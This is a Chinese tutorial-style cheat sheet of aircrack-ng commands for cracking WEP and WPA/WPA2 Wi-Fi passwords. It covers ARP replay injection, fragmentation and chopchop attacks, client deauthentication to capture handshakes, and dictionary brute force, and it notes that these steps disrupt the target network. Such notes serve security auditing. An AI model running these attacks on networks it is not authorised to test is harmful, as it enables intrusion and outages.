1. 程式人生 > >aircrack-ng 系列工具使用筆記

aircrack-ng 系列工具使用筆記

初始化工作

airmon-ng start wlan0 9

開啟一個網絡卡監聽裝置,並設定到channel 9; channel可用iwconfig修改

airodump-ng mon0

無引數啟動airodump-ng可檢視所有接收範圍內的AP、Client資訊

aireplay-ng -9 -e (bssid) -a (AP Mac) ath0

測試注入攻擊鏈路質量

airodump-ng -c (channel) --bssid (AP Mac) -w output ath0

監聽AP在頻道的所有資料包並儲存到output檔案,此步應在以下步驟提到airodump的時候執行
WEP:

aireplay-ng -1 0 -e (bssid) -a (AP Mac) -h (Host Mac) ath0

偽認證聯機請求

aireplay-ng -1 6000 -o 1 -q 10 -e (bssid) -a (AP Mac) -h (Host Mac) ath0

偽認證聯機請求併發送保持線上資料

airodump-ng -c (channel) --bssid (AP Mac) -w output ath0

監聽收集

aireplay-ng -3 -b (AP Mac) -h (Host Mac) ath0

監聽arp報文,一旦出現就不斷將該報文重發,使目標機器產生實際迴應資料,發回更多IV資料。
此時若有“內奸”,即有可控制的已經連線在目標網段的機器,ping一個網段內不存在的IP即可產生這樣一個arp報文,接下來可以執行aircrack破解了。注意這個步驟可能會對目標區域網產生類似ARP洪水攻擊一樣的效果,網內資料延時丟包都很嚴重。
對於無機器連線的WEP:

aireplay-ng -5 -b (AP Mac) -h (Host Mac) ath0

Fragmenation攻擊,監聽一個AP廣播出來的資料包,並抽離有效的偽隨機資料(PRGA),儲存到fragment-XXXX-XXXXX.xor檔案供下一步使用.
有時監聽到的不是廣播包,轉發攻擊後ap沒有迴應,一系列重試後程序會重新監聽; 有時候可能需要不少時間,加-F引數可以自動應答。

aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0 

chopchop攻擊,上述攻擊不奏效可試,相同作用

packetforge-ng -0 -a (AP Mac) -h (Host Mac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

根據fragment-0203-180343.xor檔案的PRGA,產生arp請求包,儲存到arp-request檔案

使用-k 192.168.1.1 -l 10.255.255.255可使AP產生兩倍的有效IV,192.168.1.1為確實存在的IP,通常的閘道器
使用-k 192.168.1.89 -l 10.255.255.255可使AP產生三倍的有效IV,192.168.1.89為確實存在的客戶端IP

airodump-ng -c (channel) --bssid (AP Mac) -w output ath0

監聽收集

aireplay-ng -2 -r arp-request ath0

不斷注入上述產生的arp-request報文
這一步也會使目標網路接近癱瘓,極大延時,丟包。

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (AP Map) -h (Host Mac) ath0

上述產生、傳送arp-request的步驟可由這一步替換,這是轉發任何一個收到的有效資料包,方便,缺點是若資料包較大,轉發過程較慢。還可使用-r capture-01.cap讀取以前讀取的有效資料進行轉發注入。

aircrack-ng -b (AP Mac) capture*.cap 

解密

aircrack-ng -b (AP Mac) capture*.cap 

另一種解密演算法
WPA/WPA2:

airodump-ng -c (channel) --bssid (AP Mac) -w output ath0

監聽捕捉另外一客戶端與ap之間的連線,上方出現WPA handshake: xx:xx...為成功

aireplay-ng -0 1 -a (AP Mac) -c (The Mac of a connected client) ath0

往已經連線到ap的一個客戶端偽造一個離線包,使其離線重連以便捕捉handshake.
注意要收到ACK,才表明被攻擊客戶端收到,才會下線;傳送離線不宜過密過多。

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 output*.cap

暴力破解。password.lst為密碼字典,破解的成功率取決於字典的覆蓋程度以及機器的速度。

相關推薦

aircrack-ng 系列工具使用筆記

初始化工作 airmon-ng start wlan0 9 開啟一個網絡卡監聽裝置,並設定到channel 9; channel可用iwconfig修改 airodump-ng mon0 無引數啟動airodump-ng可檢視所有接收範圍內的AP、Client資訊

Linux 網路滲透 如何使用Aircrack-ng 系列工具進行WPA/WPA2的監聽和破解

目錄: 1.前言 1.1 宣告 注意:本文章是稽核家庭無線路由器安全性的教程,破解別人的無線路由器密碼是違法的,放棄WEP,真愛WPA2,禁用WPS。 本文章為個人學習筆記和整理,如有不當之處,請予指正,歡迎在底下的品論中給我反饋,以便我可以及

aircrack-ng套件學習筆記

filters 無線 解碼 分析 cap -i one nal 安裝 Aircrack-ng套件 1、airdecap-ng   該工具主要用於對加密無線數據報文的解碼。   1、當無線網絡啟用了WEP或者WPA-PASK加密,可以使用wireshark過濾,過濾條件為:I

無線安全審計工具aircrack-ng詳解

無線滲透試的工具有很多,在windows下和Linux下的工具各有千秋,因在windows下的工具基本都是圖形介面,操作起來比較直觀易懂,在此就不再做過多介紹,本方重點介紹在linux下的一種通用的方法。 首先講一下現行無線滲透試的一般方法和原理。 目前無線滲透

介紹使用 aircrack-ng 工具集和字典破解 WIFI 密碼

// 參考網站: http://netsecurity.51cto.com/art/201105/264844_all.htm 1.使用 aircrack-ng 破解,下載網址是: https://centos.pkgs.org/6/nux-dextop-x86_64/aircrack-ng-1

Aircrack-ng套件——無線破解原理及工具詳解

前言: 現行的無線協議標準在安全方面是完全達標的,是非常安全的。如果現行的無線標準在很被攻破了,業界為什麼還一直在使用這一標準。 因此,破解之所以能成功,完全是因為USR配置路由器不當和密碼強度低的漏洞罷了。 普通無線加密及破解的分類: 1,wep加密:此類加密比較老舊,

aircrack-ng 工具集學習

一、aircrack-ng簡介 aircrack-ng是Aircrack專案的一個分支。是一個與802.11標準的無線網路分析有關的安全軟體,主要功能有:網路偵測,資料包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支援監聽模式的無線網絡卡上(裝置列表請參閱其官方網站)並嗅

Aircrack-ng學習筆記(一)

AIRMON-NG Airmon check //檢查使用環境 Airmon check kill  //關閉對aircrack-ng套件可能存在影響的服務 Airmon start wlan0 //在wlan0網絡卡上啟動monitor模式 Iwlist

Aircrack-ng學習筆記(二)aireplay-ng

Airaplay-ng 能夠產生或者加速無線通訊流量 向無線網路中注入資料包 偽造身份驗證 強制重新身份驗證 抓包重放 用於後續WEP和WPA密碼破解 支援十種包注入 獲取包的兩種途徑 指定介面 (-i) 抓包檔案pacp (-r) AIREPLAY

無線破解攻擊工具Aircrack-ng使用詳解

本文主要是針對無線網路的密碼破解,使用平臺 linux 2.26.21.5 ,實現環境 BACKTRACK 3 FINAL(USB),無線破解工具 Aircrack-ng ,官方網站http://www.aircrack-ng.org ,Aircrack-ng系列工具也有windows 平臺版本,但是本人的小

Andrew Ng機器學習筆記+Weka相關算法實現(四)SVM和原始對偶問題

優化問題 坐標 出了 變量 addclass fun ber 找到 線性 這篇博客主要解說了Ng的課第六、七個視頻,涉及到的內容包含,函數間隔和幾何間隔、最優間隔分類器 ( Optimal Margin Classifier)、原始/對偶問題 ( Pr

Kali aircrack-ng wifi密碼破解(暴力)

str 所有 路由器 log ash shake ssid 技術 獲取 1.kali linux安全滲透 2.工具aircrack-ng 3.ifconfig查看你的網卡信息,wlan0即無線網卡,註意,如果沒有發現網卡可能是芯片不能被識別,建議選擇網卡芯片為3

DevOps 系列工具之 Puppet 資源簡介

DevOps Puppet 資源清單 Puppet 可以管理的所有項目被稱為 Puppet 資源。軟件包、配置文件和服務都是 Puppet 所能管理的資源。資源指令組合為 Puppet 清單(Manifest)文件。資源是 Puppet 配置管理腳本(清單)的組成部分。資源又以下一些元素組成:類型:將

Kali之aircrack-ng

個數 IT -c 驗證 地址 rod cap RM 難度 WPA-PSK的破解基於WPA-PSK握手驗證報文數據的獲取與識別,攻擊者只要獲取到盡可能的握手驗證報文數據包就有機會破解。 安裝 aircrack-ng 套件 註:Kali linux 是自帶組件的。

Andrew Ng 深度學習筆記-01-week3-課程

weight leak andrew ng random 有一個 function 分享圖片 範圍 hid 一、專業詞匯 a hidden layer of the neural network 神經網絡的隱藏層 a single hidden layer

Person Re-identification 系列論文筆記(二):A Discriminatively Learned CNN Embedding for Person Re-identification

triplet put ali com multi 深度學習 native alt 出現   A Discriminatively Learned CNN Embedding for Person Re-identification Zheng Z, Zheng L, Ya

Person Re-identification 系列論文筆記(八):SPReID

最終 數據集 pipeline 論文筆記 cat cati 對齊 技術分享 通道 Human Semantic Parsing for Person Re-identification Kalayeh M M, Basaran E, Gokmen M, et al. H

python系列學習筆記 第一章 基礎知識

1.python 3.x版本標準的資料型別:1)number 數字  2)string 字串 3)list 列表 4)tuple 元組 5)sets 集合 6)dictionary  字典  1)number數字:pyhton3.x支援的int、float

kali linux 無線攻擊——aircrack-ng

接觸kali linux系統之後,基本命令使用的多了也就記下了,慢慢的我將重點轉到了攻擊,目前是wifi和區域網的攻擊,以後有新的經驗和體會我會再分享的。有一些東西也是學習其他大牛的,莫要嘲笑才是啊 好了進入主題:Aircrack-ng wifi 攻擊  Aircrack是破解WE

Python時間序列LSTM預測系列學習筆記(2)-單變數

本文是對: https://machinelearningmastery.com/time-series-forecasting-long-short-term-memory-network-python/ https://blog.csdn.net/iyangdi/article/deta